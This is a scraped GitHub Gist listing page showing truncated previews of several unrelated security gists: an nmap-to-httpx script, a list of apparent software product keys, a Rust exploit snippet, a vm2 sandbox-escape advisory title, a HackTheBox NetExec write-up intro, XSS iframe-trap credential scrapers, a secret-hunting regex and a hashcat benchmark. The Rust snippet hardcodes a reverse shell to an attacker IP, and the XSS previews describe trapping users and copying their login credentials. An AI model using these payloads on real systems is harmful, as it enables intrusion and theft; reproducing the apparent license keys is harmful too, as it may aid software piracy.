In vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.
clem9669
ott3rly
/ nmap-xml-to-httpx.sh
Created
February 20, 2024 09:50
Convert nmap xml output suitable for httpx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Check if an argument was provided | |
| if [ $# -eq 0 ]; then | |
| NMAP_XML_OUTPUT="/dev/stdin" | |
| else | |
| NMAP_XML_OUTPUT="$1" | |
| fi | |
| # Use xmllint to parse IP addresses and ports from the Nmap XML output |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DEMZF-UCKEE-HB222-DJDDH-594U5 | |
| DMAZF-UCKEE-A6222-8CADP-HQZ7H | |
| DPAZF-UCKEE-FH222-ET546-DLRGT | |
| DRNZF-UCKEE-UK222-RWNLU-XVZH7 | |
| DSBZF-UCKEE-BF222-K24JB-S9JLC | |
| DSHZF-UCKEE-D3222-NMB93-UKSQF | |
| DTHZF-UCKEE-BW222-Q2BKZ-NXPU8 | |
| DVAZF-UCKEE-J7222-5UHCT-QSRFE | |
| DVEZF-UCKEE-PR222-ZAPFE-4C49Q |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;) | |
| extern crate chrono; | |
| use std::fs::OpenOptions; | |
| use std::io::Write; | |
| use chrono::prelude::*; | |
| use std::process::Command; | |
| pub fn log(user: &str, query: &str, justification: &str) { | |
| let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1"; |
leesh3288
/ vm2_3.9.19_sandbox_escape_2.md
Last active
November 15, 2024 03:49
Sandbox Escape in vm2@3.9.19 via custom inspect function
mpgn
/ Scrambled vs NetExec .md
Last active
November 28, 2025 23:13
Scrambled vs NetExec for fun and profit by @mpgn_x64
Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:
smbclient won’t work, and I wasn’t able to get crackmapexec to work either.
To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)
Note: I will pass the web part where we get one username : ksimpson
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('Click ok when you\'re ready to enter iframe trap'); | |
| // Example Credential scraper and | |
| // XSS iframe trap. Load from whatever | |
| // page has the reflected/stored XSS vuln | |
| // trap the user in an iframe of the app. | |
| // Frame the login page, and copy out the | |
| // username and password fields. | |
| // @hoodoer |
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
Chick3nman
/ Apple_M1_Ultra_v6.2.5-340
Created
March 19, 2022 16:23
Hashcat v6.2.5-340 benchmark on the Apple M1 Ultra
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD | |
| Thanks to @fhlipZero(https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it. | |
| A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0 | |
| hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode | |
| Benchmarking uses hand-optimized kernel code by default. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert('Click ok when you\'re ready to enter iframe trap'); | |
| // Example XSS iframe trap. Load from whatever | |
| // page has the reflected/stored XSS vuln | |
| // trap the user in an iframe of the app. | |
| // While they surf around, they stick in your | |
| // iFrame, and you keep their session and your XSS | |
| // payload running. | |
| // @hoodoer |
NewerOlder